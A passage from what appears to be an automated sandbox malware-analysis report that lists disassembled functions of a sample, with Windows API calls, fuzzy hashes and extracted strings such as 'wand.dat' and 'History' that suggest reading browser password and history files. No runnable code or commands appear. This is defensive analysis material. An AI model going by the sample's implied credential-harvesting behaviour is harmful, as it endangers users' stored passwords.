                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                      • String ID:
                                                      • API String ID: 1471605966-0
                                                      • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                      • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                      APIs
                                                      • wcscpy.MSVCRT ref: 0044475F
                                                      • wcscat.MSVCRT ref: 0044476E
                                                      • wcscat.MSVCRT ref: 0044477F
                                                      • wcscat.MSVCRT ref: 0044478E
                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                      • String ID: \StringFileInfo\
                                                      • API String ID: 102104167-2245444037
                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID:
                                                      • API String ID: 613200358-0
                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                      APIs
                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$PlacementWindow
                                                      • String ID: AE
                                                      • API String ID: 3548547718-685266089
                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _memicmpwcslen
                                                      • String ID: @@@@$History
                                                      • API String ID: 1872909662-685208920
                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                      APIs
                                                      • memset.MSVCRT ref: 004100FB
                                                      • memset.MSVCRT ref: 00410112
                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                      • _snwprintf.MSVCRT ref: 00410141
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                      • String ID: </%s>
                                                      • API String ID: 3400436232-259020660
                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                      APIs
                                                      • memset.MSVCRT ref: 0040E770
                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSendmemset
                                                      • String ID: AE$"
                                                      • API String ID: 568519121-1989281832
                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                      APIs
                                                      • memset.MSVCRT ref: 0040D58D
                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                      • String ID: caption
                                                      • API String ID: 1523050162-4135340389
                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                      APIs
                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                      • String ID: MS Sans Serif
                                                      • API String ID: 210187428-168460110
                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcsicmpmemset
                                                      • String ID: edit
                                                      • API String ID: 2747424523-2167791130
                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                      APIs
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                      • API String ID: 3150196962-1506664499
                                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                      APIs
                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$memcmp
                                                      • String ID:
                                                      • API String ID: 3384217055-0
                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$memcpy
                                                      • String ID:
                                                      • API String ID: 368790112-0
                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                      APIs
                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                      • String ID:
                                                      • API String ID: 1889144086-0
                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                      APIs
                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                      • String ID:
                                                      • API String ID: 1661045500-0
                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                      APIs
                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                      Strings
                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpymemset
                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                      • API String ID: 1297977491-2063813899
                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                      APIs
                                                      • memset.MSVCRT ref: 0040560C
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                      • String ID: *.*$dat$wand.dat
                                                      • API String ID: 2618321458-1828844352
                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                      APIs
                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                      • wcslen.MSVCRT ref: 00410C74
                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
